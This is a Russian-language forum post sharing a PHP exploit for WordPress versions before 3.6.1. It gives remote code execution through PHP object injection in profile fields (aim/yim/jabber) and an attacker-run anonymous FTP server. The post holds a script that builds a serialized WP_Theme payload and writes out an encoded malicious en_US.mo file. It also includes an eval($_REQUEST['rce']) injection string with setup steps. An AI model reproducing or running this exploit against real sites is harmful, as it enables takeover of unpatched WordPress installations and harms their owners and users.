Показать сообщение отдельно
Старый 25.11.2016, 13:03   #76
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Метод не использует плагинов, нет необходимости в директории для записи, работает с кодом самой CMS (WP_Theme->__toString()). Нужен любой пользователь с возможностью редактирования профиля и подконтрольный FTP с возможностью анонимного входа (is_readable не хочет отдавать true с авторизацией).

Полезную нагрузку нужно подставить в aim/yim/jabber (в first_name/last_name не лезут нуллбайты). Файл en_US.mo нужно разместить по сгенерированному адресу.

PHP код:
<?php

/*
 * Wordpress < 3.6.1 RCE through PHP Object Injection
 * coded by crlf
 * rdot.org
 *
 * http://site.com/wordpress/wp-admin/profile.php?rce=phpinfo();
 * plural=1);}eval($_REQUEST['rce']);/*
 * 
 */

$ftp "ftp://127.0.0.1"//only host, without slash
$dir "yyyy"//any
$file "en_US.mo"//don't change this

eval("
class WP_Theme{
    private \$headers = array('Name'=>'Foo', 'TextDomain'=>'Bar');
    private \$theme_root = '
$ftp';
    private \$stylesheet = '
$dir';
}
"
);

echo 
"\nPayload (aim/yim/jabber):\n\n".urlencode(serialize(new WP_Theme))."𝌆\n\n\nCheck it:\n\n$ftp/path/to/anonymous/directory/$dir/languages/$file\n\n";

if(!
file_exists($file)) file_put_contents($filegzdecode(base64_decode('H4sIAAAAAAAAA3VRz08UMRQu4mnkxMGThx40COQxO4uaTTd7EBiQZCcuu7NqYgwpM8/Zkm47aTsESLj5L/jv+V94982OChde8vV9bb/k/fh+bT79ySjWCS8Ib1gX4wf5OSEjPCOUhB9rjNV/338TjyhvPKHjveF4LZe1RvbK/6OefUCtLf9snS7ZxNlLLAKclvAJnVfWCD62heVHuLTRFGvrAmS+UiUcNJWH3AoeTT7mcOhQBpLDkQwoeL+XvIMkgX6fJ2/F/v5uj4KEMMUr5R/VDTrdWPoAuZPGaxmsoxJjaapGVgg5yqXgs1oa5Rf/nwVHD+ksmujGSQ3H1i294KZeXf2oP+QdHSXbwzu8kvr1y/NpejZPZ/nXLVfg1rftYbwTZadZej93steLDq0JaKiZm5qKBLwOca2lMkNeLKTzGEbz/BgG97q26e/oIDWFLZWpBB9cqBB9gXaLMLMNVWu51G3T5nw6p78TNOi6SVfLBr4IofYijnWrVB73LtRtzOZk4CWSa3ZlYEfJQKslzxpTWhb9AQtsWO0xAgAA')));

?>
crlf вне форума   Ответить с цитированием